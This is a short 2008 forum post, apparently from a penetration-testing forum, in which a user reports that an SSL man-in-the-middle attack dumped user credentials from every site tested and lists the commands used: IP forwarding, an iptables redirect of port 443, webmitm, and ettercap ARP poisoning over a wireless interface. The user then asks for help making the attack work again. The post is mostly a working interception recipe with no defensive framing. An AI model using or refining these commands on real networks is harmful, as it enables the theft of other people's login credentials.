View Single Post
  #4 (permalink)  
Old 03-06-2008, 09:45 AM
whistler whistler is offline
Just burned his ISO
 
Join Date: Feb 2006
Posts: 2
Default ssl mitm

I have been working on this for some time now. This morning in finally got ssl mitm working to the point that every site i tested dumped the user credentials. Unfortunately I have been unsuccessful in replicating this attack. Below are the commands I used for my successful attack. I have tried so many different combinations of this attack that I’m starting to get frustrated.


echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
webmitm -d

ettercap –G
unified
ath0
arp poision
start sniffing


What am I missing? Any help on this would be greatly appreciated.

Note: my ettercap config has the iptables uncommented
Reply With Quote